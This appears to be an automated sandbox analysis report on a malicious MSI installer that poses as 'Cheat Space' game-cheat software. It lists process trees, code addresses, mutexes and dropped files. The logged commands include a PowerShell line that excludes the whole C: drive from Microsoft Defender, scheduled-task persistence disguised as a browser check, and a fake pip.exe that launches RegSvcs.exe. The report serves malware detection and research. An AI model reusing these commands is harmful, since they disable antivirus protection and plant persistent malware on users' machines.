Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF358D5	22_2_6CF358D5
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF35830	22_2_6CF35830
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF5B964	22_2_6CF5B964
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF59AAB	22_2_6CF59AAB
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF23460	22_2_6CF23460
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF35050	22_2_6CF35050
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF35274	22_2_6CF35274
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF23260	22_2_6CF23260
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_06F826F8	22_2_06F826F8
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_06F80EB3	22_2_06F80EB3
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_06F826E0	22_2_06F826E0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_06F80930	22_2_06F80930
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_07190448	22_2_07190448
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_071928EF	22_2_071928EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00417040	24_2_00417040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00401000	24_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00425810	24_2_00425810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042A020	24_2_0042A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00446880	24_2_00446880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00444150	24_2_00444150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0045490D	24_2_0045490D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00447110	24_2_00447110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004031F0	24_2_004031F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00443980	24_2_00443980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004419A0	24_2_004419A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004071B0	24_2_004071B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042A1B0	24_2_0042A1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00428270	24_2_00428270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044FA7B	24_2_0044FA7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042FA20	24_2_0042FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040D2F0	24_2_0040D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040B2A0	24_2_0040B2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00454AA1	24_2_00454AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00442B50	24_2_00442B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040DBE0	24_2_0040DBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042B380	24_2_0042B380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00404B90	24_2_00404B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00429390	24_2_00429390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042AB90	24_2_0042AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00450BA3	24_2_00450BA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00461C67	24_2_00461C67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042BC60	24_2_0042BC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00428420	24_2_00428420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00405430	24_2_00405430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00428CD0	24_2_00428CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004424D0	24_2_004424D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042A490	24_2_0042A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004474B0	24_2_004474B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00461D1F	24_2_00461D1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042D5C0	24_2_0042D5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040B5F0	24_2_0040B5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00446DA0	24_2_00446DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042E5B0	24_2_0042E5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00426E50	24_2_00426E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00442E60	24_2_00442E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00443600	24_2_00443600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00464E1C	24_2_00464E1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040D630	24_2_0040D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040A6D0	24_2_0040A6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004066D0	24_2_004066D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00402680	24_2_00402680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004076B0	24_2_004076B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0042C740	24_2_0042C740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0045FF6E	24_2_0045FF6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0040CF00	24_2_0040CF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0044AF10	24_2_0044AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004047E0	24_2_004047E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00448FF0	24_2_00448FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004487A0	24_2_004487A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00453FA0	24_2_00453FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004437B0	24_2_004437B0

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\MSI3C62.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI19CD.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\5d1856.msi

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: String function: 6CF4D520 appears 31 times
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: String function: 6CF49B35 appears 141 times
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: String function: 6CF490D8 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 004437B0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0044BF10 appears 35 times

Source: BpOyVCAP8g.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs BpOyVCAP8g.msi
Source: BpOyVCAP8g.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs BpOyVCAP8g.msi
Source: BpOyVCAP8g.msi	Binary or memory string: OriginalFilenameaischeduler.dllF vs BpOyVCAP8g.msi
Source: BpOyVCAP8g.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs BpOyVCAP8g.msi

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winMSI@32/62@4/6

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Code function: 10_2_00007FF677E225B0 GetLastError,FormatMessageA,

10_2_00007FF677E225B0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\Cheat Space Inc

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\BpOyVCAP8g.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F9CAFE3F9A48CCB4B30A0F2636E9E573 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D98E007001F77D35A61097C7682AE837
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AD2F0FCC6D57BB9B2DA85CD9D490BCDB E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:11 /f /tn BrowserHistoryCheck_NzI4 /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:11 /f /tn "LuaJIT" /tr ""C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua""
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: unknown	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Users\user\AppData\Roaming\Python\pip.exe C:\Users\user\AppData\Roaming\Python\pip.exe
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 1348
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F9CAFE3F9A48CCB4B30A0F2636E9E573 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D98E007001F77D35A61097C7682AE837	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AD2F0FCC6D57BB9B2DA85CD9D490BCDB E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }	Jump to behavior
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:11 /f /tn BrowserHistoryCheck_NzI4 /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""	Jump to behavior
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:11 /f /tn "LuaJIT" /tr ""C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua""	Jump to behavior
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Process created: C:\Users\user\AppData\Roaming\Python\pip.exe C:\Users\user\AppData\Roaming\Python\pip.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSI75E.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Tree728
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1136

Source: C:\Windows\System32\msiexec.exe	Automated click: Install
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: BpOyVCAP8g.msi

Static file information: File size 3080192 > 1048576

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pip.exe, 00000016.00000002.2937354978.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, pip.exe, 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmp, pip.exe, 00000016.00000002.2911728901.0000000005194000.00000004.00000800.00020000.00000000.sdmp, pip.exe, 00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: generally_accepted_standard_for_renewal.pdb source: pip.exe, 00000016.00000000.2836043607.0000000000C2E000.00000002.00000001.01000000.00000009.sdmp, pip.exe.9.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pip.exe, 00000016.00000002.2911728901.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, pip.exe, 00000016.00000002.2937354978.000000000676A000.00000004.08000000.00040000.00000000.sdmp, pip.exe, 00000016.00000002.2911728901.0000000005250000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_3_00007FF69A9BCF69 push eax; ret	10_3_00007FF69A9BCF6A
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E0D483 push rdi; iretd	10_2_00007FF677E0D489
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E31307 push rbp; iretd	10_2_00007FF677E31308
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E53F19 push rax; ret	10_2_00007FF677E53F1D
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E30DF0 push rbp; iretd	10_2_00007FF677E30DF1
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E3CAF0 push rdi; iretd	10_2_00007FF677E3D039
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677DF499C push rbp; ret	10_2_00007FF677DF49D8
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_3_00007FF702209D30 pushfd ; ret	18_3_00007FF702209D31
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB1307 push rbp; iretd	18_2_00007FF720BB1308
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B8D483 push rdi; iretd	18_2_00007FF720B8D489
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B7499C push rbp; ret	18_2_00007FF720B749D8
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BBCAF0 push rdi; iretd	18_2_00007FF720BBD039
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB0DF0 push rbp; iretd	18_2_00007FF720BB0DF1
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BD3F19 push rax; ret	18_2_00007FF720BD3F1D
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 20_3_00007FF64740786C push eax; retf 0005h	20_3_00007FF64740786D
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 20_3_00007FF647409D30 pushfd ; ret	20_3_00007FF647409D31
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF4CC2B push ecx; ret	22_2_6CF4CC3E
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF4D565 push ecx; ret	22_2_6CF4D578
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_07191E30 push es; ret	22_2_07191E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_0045F1DD push ecx; ret	24_2_0045F1DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_00468E9D push esi; ret	24_2_00468EA6

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Code function: 22_2_6CEFB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

22_2_6CEFB6C0

Source: pip.exe.9.dr

Static PE information: 0xA5C1704F [Thu Feb 14 13:10:39 2058 UTC]

Source: LuaJIT.exe.1.dr	Static PE information: section name: _RDATA
Source: NzI4.exe.9.dr	Static PE information: section name: _RDATA

Source: NzI4.exe.9.dr	Static PE information: real checksum: 0xde020 should be: 0xde040
Source: LuaJIT.exe.1.dr	Static PE information: real checksum: 0xde020 should be: 0xde040

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

File created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI939.tmp	Jump to dropped file
